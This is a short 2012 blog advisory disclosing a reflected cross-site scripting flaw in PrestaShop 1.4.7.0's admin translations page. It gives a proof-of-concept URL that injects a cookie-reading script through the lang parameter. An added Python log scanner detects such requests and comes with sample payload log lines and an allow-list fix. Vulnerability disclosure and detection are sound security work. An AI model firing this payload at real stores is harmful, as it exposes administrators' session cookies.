Sunday, 18 March 2012
[EN] PrestaShop 1.4.7.0 - XSS for logged-in users
# TITLE ....... # PrestaShop 1.4.7.0 XSS for logged-in users ............ #
# DATE ........ # 14.03.2012 ............................................ #
# AUTHOR ...... # http://hauntit.blogspot.com ........................... #
# SOFT LINK ... # http://www.prestashop.com ............................. #
# VERSION ..... # 1.4.7.0 ............................................... #
# TESTED ON ... # LAMP .................................................. #
# ....................................................................... #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is the bug :)
# 4. More...
#............................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
XSS for logged-in users.
#............................................#
# 3. Where is the bug :)
Log in as your 'normal user'.
And enjoy:
http:///prestashop_1.4.7.0/admin12/index.php?tab=AdminTranslations&lang=/*<script>alert(document.cookie)</script>/*&type=front&token=your.token
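A defensive check for the request above, as an added example that is not part of the original advisory: it scans web-server access-log lines for AdminTranslations requests whose `lang` value is not a plain language code. The two-letter code format, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: `lang` carries a two-letter language code such as "en" or "fr".
LANG_RE = re.compile(r"[a-z]{2}")
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Mar/2012:10:00:01 +0000] "GET /prestashop_1.4.7.0/admin12/index.php?tab=AdminTranslations&lang=en&type=front&token=abc HTTP/1.1" 200 5120',
    '192.0.2.11 - - [14/Mar/2012:10:00:07 +0000] "GET /prestashop_1.4.7.0/admin12/index.php?tab=AdminTranslations&lang=/*%3Cscript%3Ealert(document.cookie)%3C/script%3E/*&type=front&token=abc HTTP/1.1" 200 5243',
    '192.0.2.12 - - [14/Mar/2012:10:00:09 +0000] "GET /prestashop_1.4.7.0/admin12/index.php?tab=AdminOrders&token=abc HTTP/1.1" 200 811',
    '192.0.2.13 - - [14/Mar/2012:10:00:15 +0000] "GET /prestashop_1.4.7.0/admin12/index.php?tab=AdminTranslations&lang=EN%22%3E&type=front&token=abc HTTP/1.1" 200 5300',
]

def is_valid_lang(value):
    """True only for an exact two-letter lowercase code."""
    return LANG_RE.fullmatch(value) is not None

def suspicious_requests(lines):
    """Return (client_ip, decoded_lang) for AdminTranslations requests with a bad `lang`."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        if query.get("tab") != ["AdminTranslations"]:
            continue
        # parse_qs percent-decodes, so encoded payloads are checked in decoded form.
        for lang in query.get("lang", []):
            if not is_valid_lang(lang):
                hits.append((line.split(" ", 1)[0], lang))
    return hits

if __name__ == "__main__":
    for ip, lang in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent non-code lang value: {lang!r}")
```

The same `is_valid_lang` allow-list test, applied server-side before the value is echoed into the page, rejects the request shown above.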
#............................................#
# 4. More...
- http://www.prestashop.com
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#
In my opinion PrestaShop is one of the best e-store software!
Yeah I agree, Prestashop Themes are really the best template you can use to get a professional-looking shopping website. The good thing about Prestashop is it's open-source and customizable.